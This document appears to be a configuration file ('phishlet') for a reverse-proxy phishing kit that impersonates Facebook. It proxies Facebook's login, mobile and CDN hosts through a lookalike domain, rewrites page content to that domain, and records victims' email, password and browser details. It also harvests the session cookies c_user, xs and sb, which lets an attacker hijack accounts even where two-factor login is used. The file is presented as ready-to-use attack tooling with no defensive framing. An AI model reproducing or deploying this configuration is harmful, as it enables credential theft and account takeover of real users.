min_ver: '3.0.0'
proxy_hosts:
   - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true, auto_filter: true}
   - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false, auto_filter: true}
   - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: true, is_landing: false, auto_filter: true}
 
sub_filters:
  - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://facebook.com/security/', replace: 'https://{hostname}/security/', mimes: ['image/gif','text/html',]}
  - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'www.facebook.com', replace: '{hostname}', mimes: ['setResponseHeader']}
  - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: '', replace: '', mimes: ['text/html', 'application/json', 'application/javascript'], }
  - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], }
  - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript','text/javascript']}
auth_tokens:
  - domain: '.facebook.com'
    keys: ['c_user','xs','sb']
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'unenc_password'
    search: '(.*)'
    type: 'post'
  custom: 
    - key: 'pass'
      search: '(.*)'
      type: 'post'
    - key: 'Password'
      search: '(.*)'
      type: 'post'  
    - key: 'UserAgent'
      search: '(.*)'
      type: 'post'
    - key: 'Browser'
      search: '(.*)'
      type: 'post'
    - key: 'Engine'
      search: '(.*)'
      type: 'post'
    - key: 'Platform'
      search: '(.*)'
      type: 'post'

   
login:
  domain: 'www.facebook.com'
  path: '/login'
